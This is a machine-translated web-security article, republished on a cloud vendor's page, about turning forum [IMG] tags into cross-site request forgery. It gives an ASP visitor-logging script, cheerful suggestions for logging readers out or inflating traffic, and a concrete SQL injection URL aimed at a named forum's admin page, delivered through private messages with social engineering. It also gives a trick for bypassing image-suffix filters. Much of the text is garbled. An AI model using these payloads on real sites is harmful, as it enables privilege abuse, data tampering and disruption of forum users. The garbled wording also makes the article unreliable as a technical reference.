HTML tags pose a security risk test _ network security

Source: Internet
Author: User
Tags html tags
WWW service is one of the most important services on the Internet, to provide customers with a wide range of information resources, and the organization of this information resources is an important thing is HTML hypertext language, and then the application of the development of other such as UBB, such as tags but ultimately are in the HTML code to achieve. Research has found that even the safest security code (which has ruled out the usual XSS vulnerabilities) cannot avoid another annoying way of attacking, with less stringent procedures that can be exploited to create a greater threat.

We are now widely existing in the forum, article system, blog system, such as scripting [IMG] tag is the conversion of the tags for example to clear this neglected security issues! Let me start by talking about my own processing of this label and the browser's handling of the label. First look at the following UBB code:
[Img]yun_qi_img/loveshell.jpg[/img], and then through the conversion of the script program became <IMG src=yun_qi_img/loveshell.jpg>. tag is embedded in the current page of a picture, now the Forum program in the post and personal avatar There are this feature, when the browser encountered this HTML tag will be based on the address of SRC, here is yun_qi_img/ Loveshell.jpg to find the network resources, when found this image will visit and download the resource and then in the local parsing, in the browser display the picture, if not found this resource will display a red fork to indicate an error. Here yun_qi_img/ Loveshell.jpg is a very normal picture, so everything goes well, but do not know if you think about it, if this resource is other types of resources such as a Web page an EXE file or an ASP page, when not a picture type file, the result will be what?

The answer is obvious, is the picture shows a red X, our EXE file also did not download, the HTML page also did not execute, this is a matter of course, because IE or other browsers will get the resources as a picture resolution, so that will produce errors to show red X. It's not going to make any sense to be here, but if we change the image address
Http://127.0.0.1:88/imgtest/test.asp?user=shell such a form? In which test.asp has the following contents

<%
Dim Fso,file//Define FSO objects


Const ForReading = 1, ForWriting = 2, ForAppending = 8
Set FSO = Server.CreateObject ("Scripting.FileSystemObject")
Path = Server.MapPath ("Imgtest.txt")//Open the same directory Imgtest.txt


Set File=fso.opentextfile (Path, ForAppending, TRUE)
File.write ("Someone Came:")/write content
File.write (Request. ServerVariables ("Query_string"))
File.write vbCrLf
File.close
Set file = Nothing
Set fso = Nothing
%>

We can test to see that our access has been recorded, and even received the parameters submitted, but this is unknown to the browser, because we only see a red X. Here we may know what we can do with this thing! It is important to be able to silently access a page as a viewer, or even to support a get parameter request, to understand that this can be used in the back to play our imagination to use this to do what!

1 Brush flow We can in a large flow of the forum to set their own image into the page to be brushed, and then every visitor will go to visit our page, whether he looked
Here he is, but he has visited, hasn't he?

2 Destroy this makes people very annoyed, to move the network forum if your image set into logout.asp words, hehe, all see your post people will be T, very cool!
Oh, as for the Phantom Forum, we can try, but this is very immoral!

3 Hackers This is our most interesting, can do something across the purview, because now many programs for the front are better defense, but the background is not so tight
Out. If the data obtained in the program is obtained by using the method of request ("id"), then we can use the tag to submit the data to the CGI script, and note that it must not be Request.Form ("username2") which strictly specifies the source of the obtained variable, Because our variables can only be submitted through the URL is the Query_string way mentioned above. This is not a rigorous procedure is very lethal, to example, moving the net is a dynamic network of SQL version of the messages.asp to obtain data in the way is request, the code is as follows:

......
Sub Del ()
Dim Dnum
If Request ("username") = "" Then
BODY = body + "<br> +" Please enter the user name to be deleted in bulk. "
Exit Sub
End If
SQL = "Select COUNT (*) from dv_message where Sender = '" & Request ("username") & ""
Set Rs = Dvbbs.execute (SQL)
......

This was supposed to be backstage. Admin privileges are required to access, but we construct such a URL:

Http://bbs.dvbbs.net/admin/messages.asp?action=del&user= '; update/**/dv_user/**/set/**/useremail= (select/** /top/**/1/**/

[username]/**/from/**/dv_admin)/**/where[username]= ' Loveshell ';--

Or a similar statement, and put it in the [IMG] tab. We may feel that the administrator to see their own posts is not very likely, but to know that the Forum text message is also supporting and posting the same [img] label, so if you can send a message to the administrator, in the construction of our IMG tags as long as he opened a text message will be kind of Oh! If you can and social engineering a piece of the society, killing does not touch blood ah, hehe! A bit of a pity is as if the move net to & and other symbols do a conversion, we can try to break, not to mention the network on the writing process is not strict.

4 Imagination Everyone makes money so hard, if the IMG tags in the address changed to the attachment to download the address, hehe, say, no test.

5. ...

Besides, how to defend the problem, if you want to keep this [IMG] tag but do not want to issue, it is necessary to convert, such as the qualifying suffix must be jpg, hehe this can be through the URL code plus #jpg Rao, anyway, I think if there are restrictions on the general can be spared, even if you limit the IMG, Well, there are flash tags, and rm tags? ......
It's hard to defend and exploit.

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.